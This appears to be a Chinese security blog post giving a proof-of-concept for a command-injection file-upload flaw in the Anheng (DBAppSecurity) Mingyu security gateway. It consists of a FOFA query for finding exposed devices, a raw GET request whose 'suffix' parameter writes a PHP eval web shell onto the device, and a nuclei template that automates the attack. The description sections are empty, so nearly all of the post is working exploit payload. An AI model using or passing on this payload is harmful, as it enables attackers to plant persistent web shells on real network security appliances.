安恒明御安全网关文件上传

安恒明御安全网关文件上传

一、免责声明：

本次文章仅限个人学习使用，如有非法用途均与作者无关，且行且珍惜；由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号望雪阁及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

二、产品介绍：

三、资产梳理：

title=“明御安全网关”

四、漏洞复现：

五、POC：

GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1

木马地址: http://xxx/webui/.xxx.php

nuclei：

id: mingyu_upload
info:
  name: mingyu_upload
  author: joyboy
  severity: critical
  description: http://xxx.xxx.xxx/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php
  metadata:
    max-request: 1
    fofa-query: title="明御安全网关"
    verified: true
    CVE: 
  tags: 明御安全网关,uploadfile

requests:
  - raw:
      - |
        GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        part: body
        words:
          - 'success'